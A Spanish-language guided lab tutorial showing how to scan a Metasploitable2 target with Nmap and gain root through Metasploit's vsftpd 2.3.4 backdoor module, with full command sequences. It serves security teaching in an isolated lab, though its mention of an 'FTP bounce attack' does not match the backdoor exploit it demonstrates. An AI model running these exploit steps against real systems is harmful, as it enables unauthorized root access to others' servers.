Explotación de vulnerabilidades del servicio FTP con Nmap y Metasploit

NmapBeginner
Practicar Ahora

Introducción

En este laboratorio, aprenderás cómo explotar vulnerabilidades en el servicio de Protocolo de Transferencia de Archivos (File Transfer Protocol, FTP) para obtener acceso no autorizado a una máquina objetivo. El escenario está establecido en un contexto de ciberseguridad, donde asumirás el papel de un hacker ético encargado de identificar y explotar vulnerabilidades en un servidor FTP vulnerable.

El objetivo de este laboratorio es obtener acceso de superusuario (root) a la máquina objetivo Metasploitable2 aprovechando una vulnerabilidad del servicio FTP y utilizando el Framework Metasploit, una herramienta popular de pruebas de penetración. A través de esta experiencia práctica, adquirirás una comprensión más profunda del ataque de rebote FTP (FTP Bounce Attack), las técnicas de escaneo de puertos y el proceso de explotación utilizando Metasploit.

Este es un Guided Lab, que proporciona instrucciones paso a paso para ayudarte a aprender y practicar. Sigue las instrucciones cuidadosamente para completar cada paso y obtener experiencia práctica. Los datos históricos muestran que este es un laboratorio de nivel principiante con una tasa de finalización del 91%. Ha recibido una tasa de reseñas positivas del 95% por parte de los estudiantes.

Configurar el entorno de laboratorio

En este paso, configurarás el entorno de laboratorio, que consta de dos máquinas virtuales: la máquina Kali Linux como atacante y la máquina Metasploitable2 como objetivo.

  1. Inicia la máquina virtual Metasploitable2 ejecutando el siguiente comando en la terminal:
sudo virsh start Metasploitable2

Espera a que la máquina objetivo se inicie, puede tardar de 1 a 3 minutos.

  1. Verifica que la máquina Metasploitable2 esté en funcionamiento realizando un ping a ella:
ping 192.168.122.102

Presiona Ctrl+C para detener el ping.

  1. Inicia el contenedor Kali Linux y accede a su shell bash:
docker run -ti --network host b5b709a49cd5 bash
  1. Prueba la conectividad de red entre el contenedor Kali Linux y la máquina Metasploitable2:
ping 192.168.122.102

Presiona Ctrl+C para detener el ping.

Ahora tanto la máquina de ataque como la máquina objetivo están en funcionamiento, y puedes comenzar las pruebas de penetración.

Nota: Si sales accidentalmente del bash actual, el contenedor Kali se detendrá automáticamente. Puedes ejecutar docker run -ti --network host b5b709a49cd5 bash nuevamente en el host para iniciar un nuevo contenedor Kali y acceder al bash para continuar con el experimento.

Realizar un escaneo de puertos

En este paso, utilizarás la herramienta de escaneo Nmap para identificar los puertos abiertos y los servicios que se ejecutan en la máquina objetivo Metasploitable2.

  1. Inicia el servicio de base de datos PostgreSQL, que es necesario para Metasploit:
service postgresql start
  1. Inicializa la base de datos de Metasploit:
msfdb init
  1. Inicia la consola del Framework Metasploit:
cd ~
msfconsole
  1. Utiliza Nmap para escanear la máquina objetivo e identificar los puertos abiertos:
nmap -sV -T4 192.168.122.102

La opción -sV habilita la detección de versiones de los puertos abiertos, y -T4 establece la política de tiempo para un escaneo más rápido.

Presiona Ctrl+D para salir de la consola de Metasploit y luego comienza la inspección

Explotar la vulnerabilidad del servicio FTP

En este paso, aprovecharás la vulnerabilidad identificada en el servicio FTP para obtener acceso no autorizado a la máquina objetivo Metasploitable2.

  1. En primer lugar, si no estás en la consola de Metasploit, debes iniciar la consola de Metasploit:
cd ~
msfconsole
  1. Busca un módulo de escáner de FTP en Metasploit:
search scanner/ftp
  1. Utiliza el módulo ftp_version para escanear el servicio FTP:
use auxiliary/scanner/ftp/ftp_version
  1. Establece el host objetivo para el escaneo:
set RHOSTS 192.168.122.102
  1. Ejecuta el escaneo de la versión de FTP:
exploit
  1. Basándote en la versión de FTP identificada, busca un módulo de explotación correspondiente:
search vsFTPd
  1. Utiliza el módulo vsftpd_234_backdoor para explotar la vulnerabilidad:
use exploit/unix/ftp/vsftpd_234_backdoor
  1. Establece el host objetivo para la explotación:
set RHOST 192.168.122.102
  1. Ejecuta la explotación:
exploit

Presiona Ctrl+D para salir de la consola de Metasploit y luego comienza la inspección

Verificar la explotación exitosa

En este paso, verificarás que la explotación fue exitosa y que has obtenido acceso de superusuario (root) a la máquina objetivo Metasploitable2.

  1. En primer lugar, si no estás en la consola de Metasploit, debes iniciar la consola de Metasploit:
cd ~
msfconsole
  1. Verifica el usuario actual:
whoami
  1. Verifica el nombre de host de la máquina comprometida:
hostname
  1. Verifica la dirección IP de la máquina comprometida:
ifconfig

Presiona Ctrl+D para salir de la consola de Metasploit y luego comienza la inspección

Resumen

En este laboratorio, aprendiste cómo explotar una vulnerabilidad en un servicio FTP para obtener acceso no autorizado a una máquina objetivo. Configuraste un entorno de laboratorio con una máquina Metasploitable2 vulnerable y una máquina de ataque Kali Linux. Realizaste un escaneo de puertos utilizando Nmap para identificar los puertos abiertos y los servicios, y luego aprovechaste el Framework Metasploit para explotar una vulnerabilidad identificada en el servicio FTP. Finalmente, verificaste la explotación exitosa comprobando el usuario actual, el nombre de host y la dirección IP de la máquina comprometida.

A través de esta experiencia práctica, adquiriste conocimientos y habilidades prácticas en la identificación y explotación de vulnerabilidades, el uso de herramientas populares de ciberseguridad como Nmap y Metasploit, y la comprensión de la técnica de ataque FTP Bounce. Estas habilidades son esenciales para los hackers éticos y los profesionales de la ciberseguridad para evaluar y fortalecer la postura de seguridad de sistemas y redes.